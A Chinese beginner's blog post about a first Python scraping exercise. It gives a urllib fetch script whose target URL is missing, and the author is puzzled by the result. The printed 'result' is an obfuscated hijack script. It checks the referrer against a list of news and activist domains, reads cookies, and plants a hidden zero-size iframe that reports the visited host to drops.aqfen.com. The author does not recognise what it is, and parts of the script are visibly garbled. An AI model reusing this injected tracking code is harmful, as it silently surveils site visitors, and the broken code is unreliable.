Python:学习Python爬虫的第一天

阅读: 评论:0

Python:学习Python爬虫的第一天

Python:学习Python爬虫的第一天

疑问:

跟着Python教学视频,爬百度首页,结果不同?(代码、结果往下看)

1:

发现本地的IE浏览器打开百度有报错,搜狗浏览器可以正常打开。而且,eclipse执行出来的结果跟在IE浏览器里查看到的百度首页源码是一样的,360浏览器的源码则跟视频里的一样。莫不是eclipse默认用的是IE浏览器?

2:

修复IE浏览器:url=/  打开仍有报错,url=/  可以正常打开。

eclipse执行还是不对。

3:

换了个url=/ 爬 IE跟搜狗的源代码相同,eclipse的结果还是怪怪的。。。证明跟浏览器无关了。

4:

爬酷狗首页不正确的原因找到了。

其实结果是对的,只是因为Eclipse Console默认限制了输出的字符数(只显示最后80000个字符),去掉该勾选后,显示正常。

 百度。。。还是不知道为什么,换了个电脑效果一样的。


环境:Python 3.x + eclipse

代码如下:


import re
from urllib import request
 
# NOTE(review): "/" has no scheme or host, so request.Request() rejects it
# with "ValueError: unknown url type". The real address seems to have been
# lost from this listing -- put the full http(s):// URL of the page here.
url=r"/"


def fetch_html(target, fallback_encoding='utf-8'):
    """Download *target* and return its body decoded to text.

    Args:
        target: Absolute URL to fetch.
        fallback_encoding: Codec used when the response's Content-Type
            header does not declare a charset.

    Returns:
        The response body as a ``str``.

    Raises:
        ValueError: If *target* is not an absolute URL.
        urllib.error.URLError: If the request fails.
        LookupError: If the declared charset names a codec Python lacks.
        UnicodeDecodeError: If the body is not valid in the chosen codec.
    """
    # Build a custom request object
    req = request.Request(target)

    # Send the request; the with-block closes the response even when
    # reading fails, so the connection is never left dangling.
    with request.urlopen(req) as resp:
        body = resp.read()
        # Prefer the charset the server declares over a hard-coded guess,
        # so pages that are not UTF-8 (e.g. GBK) still decode correctly.
        charset = resp.headers.get_content_charset() or fallback_encoding

    return body.decode(charset)


if __name__ == "__main__":
    response = fetch_html(url)

    # Optional data-cleaning step: to keep only the page title, filter the
    # text with a regular expression, e.g.
    #     re.findall(r"<title>(.*?)</title>", response)

    print(response)

 

执行后结果如下:


<!DOCTYPE html>
<html lang="zh-CN"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<script type="text/javascript">
    (function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o<c.length&&!e;o++)try{e=new ActiveXObject(c[o])}catch(n){}}return e?e:(alert("Error creating the XMLHttpRequest object."),void(location.href=t))}function c(t,e){if(o)try{o.open("GET",t,!0),o.onreadystatechange=function(){if(4=&#adyState)if(200==o.status)try{sponseText)}catch(t){}else document.write("HTTP Status "+o.status),document.close()},o.send(null)}catch(n){document.write("Can't connect to server:n"+n),document.close()}}var o=n()
c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = ateElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||ElementsByTagName('head')[0]).appendChild(n1);},1000);})})('/?t=912558218',"var __encode ='sojson', _0xb483=["x5Fx64x65x63x6Fx64x65","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex73x6Fx6Ax73x6Fx6Ex2Ex63x6Fx6Dx2Fx6Ax61x76x61x73x63x72x69x70x74x6Fx62x66x75x73x63x61x74x6Fx72x2Ex68x74x6Dx6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["x6Ex75x72x2Ex63x6E","x69x7Ax64x61x2Ex63x6Fx6D","x62x61x64x61x6Dx62x69x7Ax2Ex63x6Fx6D","x75x71x75x72x2Ex63x6E","x75x6Cx69x6Ex69x78x2Ex63x6Fx6D","x65x79x6Ex65x6Bx2Ex6Ex65x74","x65x79x6Ex65x6Bx2Ex62x69x7A","x63x68x65x6Ex67x61x62x6Cx65x2Ex6Ex65x74","x78x6Dx64x35x2Ex63x6Fx6D","x78x6Dx64x35x2Ex6Fx72x67","x66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6D","x74x77x69x74x74x65x72x2Ex63x6Fx6D","x75x68x72x70x2Ex6Fx72x67","x69x73x74x69x71x6Cx61x6Cx68x65x77x65x72x2Ex63x6Fx6D","x6Dx61x61x72x69x70x2Ex6Fx72x67","x74x72x74x2Ex6Ex65x74x2Ex74x72","x74x75x72x6Bx69x73x74x61x6Ex74x69x6Dx65x73x2Ex63x6Fx6D","x75x79x67x68x75x72x61x6Dx61x72x69x63x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x63x6Fx6Ex67x72x65x73x73x2Ex6Fx72x67","x75x79x67x68x75x72x65x6Ex73x65x6Dx62x6Cx65x2Ex63x6Fx2Ex75x6B","x75x79x67x68x75x72x69x73x74x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x6Ax61x70x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x70x72x65x73x73x2Ex63x6Fx6D","x75x79x67x68x75x72x79x61x72x2Ex6Fx72x67","x75x79x68x65x77x65x72x2Ex62x69x7A","x75x79x6Dx61x61x72x69x70x2Ex63x6Fx6D","x61x6Bx61x64x65x6Dx69x79x65x2Ex6Fx72x67","x69x73x74x69x71x6Cx61x6Cx2Ex6Ex65x74","x69x75x68x72x64x66x2Ex6Fx72x67","x6Fx6Cx69x6Dx61x6Cx61x72x2Ex6Fx72x67","x72x66x61x2Ex6Fx72x67","x75x6Ex74x72x2Ex6Fx72x67","x75x79x67x68x75x72x6Ex65x74x2Ex6Fx72x67","x61x61x77x73x61x74x2Ex63x6Fx6D","x61x68x73x65x6Ex64x65x72x2Ex63x6Fx6D","x62x65x68x69x6Ex64x2Dx62x61x72x73x2Ex6Ex65x74","x62x65x73x74x67x6Fx72x65x2Ex63x6Fx6D","x62x69x6Cx69x71x69x7Ax2Ex63x
6Fx6D","x62x69x71x6Cx65x2Ex63x6Fx6D","x62x6Cx69x70x2Ex74x76","x63x68x69x6Ex65x73x65x2Ex75x68x72x70x2Ex6Fx72x67","x63x68x69x6Ex65x73x65x62x6Cx6Fx67x2Ex75x68x72x70x2Ex6Fx72x67","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex62x75x6Cx74x65x6Ex69x2Ex63x6Fx6D","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex63x61x2Ex74x72x2Ex67x67","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex73x65x6Dx70x6Fx7Ax79x75x6Dx75x2Ex63x6Fx6D","x64x6Fx77x6Ex65x75x2Ex6Fx72x67","x64x6Fx77x6Ex6Cx6Fx61x64x64x61x69x6Cx79x6Dx6Fx74x69x6Fx6Ex2Ex63x6Fx6D","x65x61x73x74x2Dx74x75x72x6Bx69x73x74x61x6Ex2Ex74x76","x65x61x73x74x65x72x6Ex74x75x72x6Bx69x73x74x61x6Ex67x6Fx76x65x72x6Ex6Dx65x6Ex74x2Ex63x6Fx6D","x65x61x73x74x74x75x72x6Bx65x73x74x61x6Ex2Ex63x6Fx6D","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex2Dx67x6Fx76x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex2Dx67x6Fx76x65x72x6Ex6Dx65x6Ex74x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex63x63x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex67x6Fx76x65x72x6Ex6Dx65x6Ex74x69x6Ex65x78x69x6Cx65x2Ex75x73","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex69x6Ex66x6Fx2Ex63x6Fx6D","x72x66x69x2Ex66x72","x63x68x6Fx73x75x6Ex2Ex63x6Fx6D","x63x6Ex61x2Ex63x6Fx6Dx2Ex74x77","x72x74x68x6Bx2Ex68x6B","x73x74x68x65x61x64x6Cx69x6Ex65x2Ex63x6Fx6D","x6Fx72x69x65x6Ex74x61x6Cx64x61x69x6Cx79x2Ex6Fx6Ex2Ex63x63","x69x2Dx63x61x62x6Cx65x2Ex63x6Fx6D","x6Dx69x6Ex67x70x61x6Fx6Dx6Fx6Ex74x68x6Cx79x2Ex63x6Fx6D","x79x7Ax7Ax6Bx2Ex63x6Fx6D","x6Ex65x78x74x6Dx65x64x69x61x2Ex63x6Fx6D","x63x68x69x6Ex65x73x65x70x65x6Ex2Ex6Fx72x67","x62x6Fx78x75x6Ex2Ex63x6Fx6D","x6Dx69x6Ex67x6Ax69x6Ex67x6Ex65x77x73x2Ex63x6Fx6D","x62x65x69x6Ax69x6Ex67x73x70x72x69x6Ex67x2Ex63x6Fx6D","x6Dx73x67x75x61x6Ex63x68x61x2Ex63x6Fx6D","x62x6Fx74x61x6Ex77x61x6Ex67x2Ex63x6Fx6D","x77x72x63x68x69x6Ex61x2Ex6Fx72x67","x6Fx70x65x6Ex2Ex63x6Fx6Dx2Ex68x6B","x61x62x6Fx6Cx75x6Fx77x61x6Ex67x2Ex63x6Fx6D","x36x70x61x72x6Bx2Ex63x6Fx6D","x63x72x65x61x64x65x72x73x2Ex6Ex65x74","x77x65x6Ex78x75x65x63x69x74x79x2Ex63x6Fx6D","x73x69x6Ex6Fx76x69x73x69x6Fx6Ex2Ex6Ex65
x74","x68x61x76x65x38x2Ex74x76","x70x6Fx70x79x61x72x64x2Ex6Fx72x67","x6Dx69x74x62x62x73x2Ex63x6Fx6D","x6Fx7Ax63x68x69x6Ex65x73x65x2Ex63x6Fx6D","x79x6Fx72x6Bx62x62x73x2Ex63x61","x77x65x73x74x63x61x2Ex63x6Fx6D","x74x6Fx6Bx79x6Fx63x6Ex2Ex63x6Fx6D","x31x36x33x2Ex63x6Fx6D","x71x71x2Ex63x6Fx6D","x69x66x65x6Ex67x2Ex63x6Fx6D","","x72x65x66x65x72x72x65x72","x64x6Fx63x75x6Dx65x6Ex74","x74x6Fx70","x6Cx6Fx67","x70x61x72x65x6Ex74","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x6Cx65x6Ex67x74x68","x69x6Ex64x65x78x4Fx66","x63x6Fx6Fx6Bx69x65","x69x6Dx6Dx6Fx72x74x61x6Cx5F","x65x72x72x6Fx72","x69x66x72x61x6Dx65","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x73x72x63","x68x74x74x70x3Ax2Fx2Fx64x72x6Fx70x73x2Ex61x71x66x65x6Ex2Ex63x6Fx6Dx2Fx61x64x76x65x72x74x69x73x65x2Fx70x75x62x6Cx69x63x2Fx3Fx73x79x73x64x61x74x61x3D","x26x68x6Fx73x74x3D","x66x72x61x6Dx65x62x6Fx72x64x65x72","x68x65x69x67x68x74","x77x69x64x74x68","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx64x72x6Fx70x73x2Ex61x71x66x65x6Ex2Ex63x6Fx6Dx2Fx61x64x76x65x72x74x69x73x65x2Fx70x75x62x6Cx69x63x2Fx3Fx73x79x73x64x61x74x61x3D","x22x20x77x69x64x74x68x3Dx30x20x68x65x69x67x68x74x3Dx30x20x66x72x61x6Dx65x62x6Fx72x64x65x72x3Dx30x3Ex3Cx2Fx69x66x72x61x6Dx65x3E","x77x72x69x74x65"];var stander_url= new 
Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45],__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< 
stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");
</script>
</head>
<body style="display:none">
</body>
</html>

本文发布于:2024-02-04 09:52:21,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170704514554528.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:爬虫   Python
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22 网站地图23